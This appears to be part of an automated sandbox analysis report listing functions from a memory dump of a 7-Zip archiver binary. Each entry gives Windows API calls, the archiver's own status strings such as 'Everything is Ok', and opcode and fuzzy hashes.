                                • Opcode ID: 5d370a213c82000d50df565d7eb6e23dcd88d717ff6f1e5d8fdea57efaf77ff4
                                • Instruction ID: 8de0c168a01220b3c10bd43a078439a77133aa7d22c198e9c7338efa88badbc3
                                • Opcode Fuzzy Hash: 5d370a213c82000d50df565d7eb6e23dcd88d717ff6f1e5d8fdea57efaf77ff4
                                • Instruction Fuzzy Hash: 5E11267361AF4A96DA51CF55F480B9AB364F7A4B80F445022EB8E47728EF3CC599CB40
                                Function 0046DEA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 15libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcVersion
                                • String ID: SetDefaultDllDirectories$kernel32.dll
                                • API String ID: 3310240892-2102062458
                                • Opcode ID: 563f298735a5d66526b1f5c30411171ea632dd5cbad4a3b668af6bb52f64e198
                                • Instruction ID: ac3bad5048391dc924837b265b4de0de68b93b5c50d8d8ec178c94dc79a7cb7f
                                • Opcode Fuzzy Hash: 563f298735a5d66526b1f5c30411171ea632dd5cbad4a3b668af6bb52f64e198
                                • Instruction Fuzzy Hash: 53E01794B8B906C1FE08ABA5FCA83141321BB94701FC40017C60F0A360EF2C898AC309
                                Function 0041C204 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 212timeCOMMON
                                Download Yara Rule
                                APIs
                                • FileTimeToLocalFileTime.KERNEL32 ref: 0041C220
                                • FileTimeToSystemTime.KERNEL32 ref: 0041C234
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: Time$File$LocalSystem
                                • String ID: gfff
                                • API String ID: 1748579591-1553575800
                                • Opcode ID: 15b91f131dabc2e5de4b5579ca893f376c918929ab631d04e4bfcae691de9260
                                • Instruction ID: 76a2171bd26c38dac9e08be45b9cf99993981d8257b9afc590bf028ee48734e6
                                • Opcode Fuzzy Hash: 15b91f131dabc2e5de4b5579ca893f376c918929ab631d04e4bfcae691de9260
                                • Instruction Fuzzy Hash: 77616A63F086C04BE31A8B3DD8A67DE6FC1E3A5704F098219DF9187789E66DC50AC761
                                Function 0041C7DC Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041C7B4: GetCurrentProcess.KERNEL32 ref: 0041C7BE
                                • GetSystemInfo.KERNEL32 ref: 0041C820
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CurrentInfoProcessSystem
                                • String ID:
                                • API String ID: 1098911721-0
                                • Opcode ID: 92f3851c50a7677658cd70336f011c22dc4d7f21b1de78bcfa5f456b2cef6102
                                • Instruction ID: 6e8e4b8d753c5d619dcf4c8f60d985c4f8ea72eb1caa61b9eb78ae6d1c6019cd
                                • Opcode Fuzzy Hash: 92f3851c50a7677658cd70336f011c22dc4d7f21b1de78bcfa5f456b2cef6102
                                • Instruction Fuzzy Hash: C6E092B266445083CB70EB08DCC17AAA360F794786FC05213E58A82F14DB2DC695CF08
                                Function 0042E8E0 Relevance: .2, Instructions: 150COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 51b87b423445c07e3ff9f805dcea364fc8add8783b730053b3f1e0467506e147
                                • Instruction ID: 9011c9268c53e8ea481907737bc709f3ea53e4807f6b3ab2afdd051ea7549f1b
                                • Opcode Fuzzy Hash: 51b87b423445c07e3ff9f805dcea364fc8add8783b730053b3f1e0467506e147
                                • Instruction Fuzzy Hash: 9B416AA3B2157013EB1C8D1BAC14B355543B7C8394F9AE23A9E274F7C9E97D8C42C289
                                Function 0042DF78 Relevance: .1, Instructions: 135COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a1e193211b1377197a9ffed0db1a3082c11c6598efc29a2749b5744c5b9d6266
                                • Instruction ID: e6fd6e75b518488c83082ff478ed8f76231815600e2e357874e717f00e7f216a
                                • Opcode Fuzzy Hash: a1e193211b1377197a9ffed0db1a3082c11c6598efc29a2749b5744c5b9d6266
                                • Instruction Fuzzy Hash: F63113906B10F0038B1C0AAFECB3333200213902041FD842FB70385F80ED1CC811010C
                                Function 0046DD60 Relevance: .1, Instructions: 93COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9bf3d84cf31aa177eb5d0cb971182c19ef539d475a2d73d801f53471c03aa189
                                • Instruction ID: f52d9a01066fed735ac48f46ccf263126aeea3bd06bcdfba80e743d215ba9300
                                • Opcode Fuzzy Hash: 9bf3d84cf31aa177eb5d0cb971182c19ef539d475a2d73d801f53471c03aa189
                                • Instruction Fuzzy Hash: 17314D77760A0647D78CCA29DC73B7A32E1E389205F849A3EEA5ACA2C1E738D415C344
                                Function 0042DCAC Relevance: .1, Instructions: 90COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2cd27a4dda1deeeaf334fe34166b18873a0706cf160d75d765b7e8183f0e3f57
                                • Instruction ID: 858cf4d25f1df30a1382e2175bcd46ff84fd8700506ab727d4d98afb566c22e8
                                • Opcode Fuzzy Hash: 2cd27a4dda1deeeaf334fe34166b18873a0706cf160d75d765b7e8183f0e3f57
                                • Instruction Fuzzy Hash: D5216E27B51E181BEF1E8939F811BEA16805B94B84F89503AAD0FD3788E9BCDD47C304
                                Function 0046E4D1 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 05d75bd9e6c7a1b6fb157d21d0ebc0644388d6d38c98960a44e8038350d5c7f1
                                • Instruction ID: 8ffef5796404105db817fda9cf3c22bbe175c44f8ea82bac2a2ddf0ecb3be315
                                • Opcode Fuzzy Hash: 05d75bd9e6c7a1b6fb157d21d0ebc0644388d6d38c98960a44e8038350d5c7f1
                                • Instruction Fuzzy Hash: D62129B7E102A04BC7068E7ED6842E6B391F7047FEF024722EF5563AD8E11C6454C250
                                Function 0046E5C0 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3590c6d0bcf59f41b6e76912e67f45de8633cf2801e00cea3d94b070f5cd6fe1
                                • Instruction ID: fb41a8172f9b7f715e729bb568392e66779742b0a448fa428a8e01dc66fbc93b
                                • Opcode Fuzzy Hash: 3590c6d0bcf59f41b6e76912e67f45de8633cf2801e00cea3d94b070f5cd6fe1
                                • Instruction Fuzzy Hash: 992138F3A204608AC306CF3ADA887B663E1FB187FDF5687228F5257AC8E51C9441D610
                                Function 0046E460 Relevance: .0, Instructions: 20COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2716c4ae18f5ff5d555640cd6024ddbdb25aea7ac000581464c462b0bdaade77
                                • Instruction ID: 9ab6d6dda478acfafeb67826c4488e77cb332f001fa19a8b07431decd4c83304
                                • Opcode Fuzzy Hash: 2716c4ae18f5ff5d555640cd6024ddbdb25aea7ac000581464c462b0bdaade77
                                • Instruction Fuzzy Hash: 38D01275BA900343EF88313C29023A911C14398325FA88A9DEC1EC6751E55DCEF2940C
                                Function 00438ECC Relevance: 128.0, APIs: 102, Instructions: 474COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ErrorLast
                                • String ID:
                                • API String ID: 408039514-0
                                • Opcode ID: 606528062de862ecd2e5ad603e6f1674b931153cadb5dc82d0d34aaa2013ffa8
                                • Instruction ID: d044f415b01c67fcc44e9bfdf86bb16f18a381088ce2a6bba04e524d1dbe4e40
                                • Opcode Fuzzy Hash: 606528062de862ecd2e5ad603e6f1674b931153cadb5dc82d0d34aaa2013ffa8
                                • Instruction Fuzzy Hash: B502D83229568D82CB20EB33F55169FA720F7C5784F401117EE9ED7A25DEACC892CB49
                                Function 004282C8 Relevance: 64.8, APIs: 35, Strings: 8, Instructions: 291COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Cannot fill link data, xrefs: 0042852A
                                • Empty link, xrefs: 00428406
                                • Internal error for symbolic link file, xrefs: 004285A8
                                • Dangerous link path was ignored, xrefs: 00428377
                                • Cannot create symbolic link, xrefs: 00428660
                                • Cannot create hard link, xrefs: 00428451
                                • Incorrect path, xrefs: 004283D4
                                • Dangerous symbolic link path was ignored, xrefs: 004284D6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Cannot create hard link$Cannot create symbolic link$Cannot fill link data$Dangerous link path was ignored$Dangerous symbolic link path was ignored$Empty link$Incorrect path$Internal error for symbolic link file
                                • API String ID: 1294909896-553938736
                                • Opcode ID: af50df62797d8402ac558955d229e3593c8d56c8c66c2bf677da475acf059cb7
                                • Instruction ID: 83032b3450fd25a6ca6c4dfe45f8fb08ccfe11b6ae4438954de31862d0dff733
                                • Opcode Fuzzy Hash: af50df62797d8402ac558955d229e3593c8d56c8c66c2bf677da475acf059cb7
                                • Instruction Fuzzy Hash: 66B1A43135968992CB10EF32F5516AF6760F7C5B88F80112BEE8E97625CE7CC896C708
                                Function 00424A54 Relevance: 40.7, APIs: 25, Strings: 2, Instructions: 211COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove$ExceptionThrow
                                • String ID: incorrect update switch command$pqrxyzw
                                • API String ID: 3957182552-3922825594
                                • Opcode ID: 4dbbf3394c81694722ba41e8c04aeaf2ab8cd2185d22ae2639c85707d97c8b65
                                • Instruction ID: fd7c4fb7535536b3bb5cce0577f09a4531a2f13d5d81e1059d709ebba58055a7
                                • Opcode Fuzzy Hash: 4dbbf3394c81694722ba41e8c04aeaf2ab8cd2185d22ae2639c85707d97c8b65
                                • Instruction Fuzzy Hash: E081A532314A9992CB20EF26F4513AE6720F7C5B88F814117EE9E8B654DF7CC986C748
                                Function 0043A43C Relevance: 40.4, APIs: 32, Instructions: 434COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove$ExceptionThrow$malloc
                                • String ID:
                                • API String ID: 3260709843-0
                                • Opcode ID: 4a3e2bc2dd42a73d5509f24f1d9046911ceaebcabc1824e8b94eb4b54359e6bb
                                • Instruction ID: dff9de89d5f9a47b38b8e74730956bfa6a3f1fb4476ef47a39ad48ec63a9f5c5
                                • Opcode Fuzzy Hash: 4a3e2bc2dd42a73d5509f24f1d9046911ceaebcabc1824e8b94eb4b54359e6bb
                                • Instruction Fuzzy Hash: 51E1173324468486CB20FE26E4401AEA760F3897D4F59122BEFED5B715CE7DC896C709
                                Function 0041B298 Relevance: 37.8, APIs: 22, Strings: 3, Instructions: 338COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID: \$\\?\$\\?\UNC\
                                • API String ID: 0-1962706685
                                • Opcode ID: d1bc74fbf01745a4a166a20ad209d2d00a43ffdc70ac4d64822cf20d0187cbe9
                                • Instruction ID: 1caa733b5473a1b7691a847b6dc08f92b6205682c34f05f121fc91eef934bd8b
                                • Opcode Fuzzy Hash: d1bc74fbf01745a4a166a20ad209d2d00a43ffdc70ac4d64822cf20d0187cbe9
                                • Instruction Fuzzy Hash: 98C1D13220864491CF20EF22E5511EF6B21EBC27D8B805117FE5A87766DFACC5CAC789
                                Function 004164DC Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 351COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$wcscmp$ExceptionThrowmemmove
                                • String ID: Empty file path
                                • API String ID: 3919112945-1562447899
                                • Opcode ID: f40a86b2d740949e4fc37305ea7d705f97ba6ef54802d9922aa52431bbc2e2cf
                                • Instruction ID: 01d614fedc95cb1e3ad929ede0c1b5c891aff517ea7f5dc0f8e8acae4ce04dd4
                                • Opcode Fuzzy Hash: f40a86b2d740949e4fc37305ea7d705f97ba6ef54802d9922aa52431bbc2e2cf
                                • Instruction Fuzzy Hash: BDD1F47620868486CB20DF26E4403AFBB61F384B98F454217EE9E57B59DF3DC995CB08
                                Function 00467EC8 Relevance: 31.4, APIs: 25, Instructions: 159COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: f1ac6982316865ef78115947ac071b5bc853db16aa935c33ea20d6eeb25a1a84
                                • Instruction ID: 96b3147e217b245d1af462bf7bf1f74d87da3eee953ef8315f682ccadbdc7a94
                                • Opcode Fuzzy Hash: f1ac6982316865ef78115947ac071b5bc853db16aa935c33ea20d6eeb25a1a84
                                • Instruction Fuzzy Hash: 8D516126650A8C86C720EE32E5512AE2320FB95FDCF5D463BDE2D5F719DE6CC8528318
                                Function 00411E58 Relevance: 29.0, APIs: 23, Instructions: 296COMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411E9F
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411EC3
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorLast
                                • String ID:
                                • API String ID: 1452528299-0
                                • Opcode ID: d06f18548cc27d6c7c38715c986d106ea2787ca676eb2784276e7a7efb1d782b
                                • Instruction ID: d24857ebdea12458a7c2ed9b7760759e41903239396e9667849a29c99dfdf4c8
                                • Opcode Fuzzy Hash: d06f18548cc27d6c7c38715c986d106ea2787ca676eb2784276e7a7efb1d782b
                                • Instruction Fuzzy Hash: DBA1C63224864596CB20DF22E5501EFA720F7D5794F940217EB9E87768DEBCC9D6CB08
                                Function 0043A000 Relevance: 29.0, APIs: 23, Instructions: 213COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ErrorLastmemmove
                                • String ID:
                                • API String ID: 3561842085-0
                                • Opcode ID: c7de1312469f12b58a544419150d20ceaeec8a7107733208b76bd11ca0581b8d
                                • Instruction ID: a6c43d468644b1504b15c295f1c976a4a1c8fac406d8c65d49b517599dd79be5
                                • Opcode Fuzzy Hash: c7de1312469f12b58a544419150d20ceaeec8a7107733208b76bd11ca0581b8d
                                • Instruction Fuzzy Hash: F771B632254A8992CB20EB26F8403DFA720E7C57D4F441217EE9D97769DF6CC896CB08
                                Function 0042D0C0 Relevance: 28.8, APIs: 18, Strings: 1, Instructions: 300COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: \\?\
                                • API String ID: 1294909896-4282027825
                                • Opcode ID: 58fb320e522f21448c9fbe0c5af8d10d02413ae22195db74b095f11017bf6ed2
                                • Instruction ID: cc4e2e7923025964291639ebd00778b15a7f8e5ab4c71bc8a5cee8dbf7c3204f
                                • Opcode Fuzzy Hash: 58fb320e522f21448c9fbe0c5af8d10d02413ae22195db74b095f11017bf6ed2
                                • Instruction Fuzzy Hash: F7C17F32305A4492CB14EF26E5903AEB760FB85B98F840227EE5E87764DF7CC996C704
                                Function 00466E78 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 160COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$free$fputc
                                • String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
                                • API String ID: 2662072562-1527772849
                                • Opcode ID: 7f73d564eba46600bd5001ebbad9a4b778d2c24ea40b066bd2d2430932a05250
                                • Instruction ID: 5e37668a64030dd6749bc128ec46aea931d6d3cd1da858e018d488ba7c5e9e13
                                • Opcode Fuzzy Hash: 7f73d564eba46600bd5001ebbad9a4b778d2c24ea40b066bd2d2430932a05250
                                • Instruction Fuzzy Hash: 1C51807220864086CE24EB26D6903AF6322F784BDCF44421BEF5E47795EF6CC995C31A
